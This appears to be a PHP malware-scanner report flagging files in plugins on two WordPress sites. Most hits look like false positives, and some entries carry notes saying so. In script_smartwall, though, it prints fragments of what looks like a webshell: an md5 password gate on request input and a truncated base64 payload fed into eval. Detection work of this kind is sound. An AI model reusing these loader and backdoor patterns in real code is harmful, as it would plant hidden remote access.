Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 2
| Description | Match |
|---|
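Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] (the matched span below runs from an `array_filter($allPatterns)` call with no callback into a `$_GET` key check in the next method, so confirm it by hand) |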
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-13 15:52:49 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:50 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:42 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/volgograd/data/www/intim-volgograd.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-29 17:18:10 Modified: 2020-09-29 17:18:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-02-14 22:45:14 Modified: 2021-02-15 08:42:07 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-02-14 22:45:14 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:51 Modified: 2021-05-16 20:47:51 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
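Exploit hacked_by Line: 7576 Dangerous Hacker credits. The match is only the two words shown below; upstream PHPExcel has a developer code comment that begins this way, so read line 7576 in context and diff the file against the upstream release before treating it as a defacement marker |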
Hacked by
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 5
| Description | Match |
|---|
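Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. Every nano match in this part of the report is a function call made through an array element; the one below is a PCLZIP_CB_* option callback inside a zip library file, so compare the file with its upstream release before classing it as a webshell |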
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
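Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request. With `extract($_POST)` every request parameter becomes a local variable and can overwrite variables already in scope, so review what the code at and after line 12 does with them |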
extract($_POST)
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Dangers: 1
|
//var/www/rostov/data/www/intim-rostova.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-02-14 22:45:16 Modified: 2021-02-15 08:42:07 Warns: 3
| Description | Match |
|---|
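Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code. The three matches in this file are consecutive lines of sequential values (chr(0), chr(1), chr(2), …) in a barcode source file, which looks like a character table rather than an encoded payload; confirm against the upstream TCPDF file |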
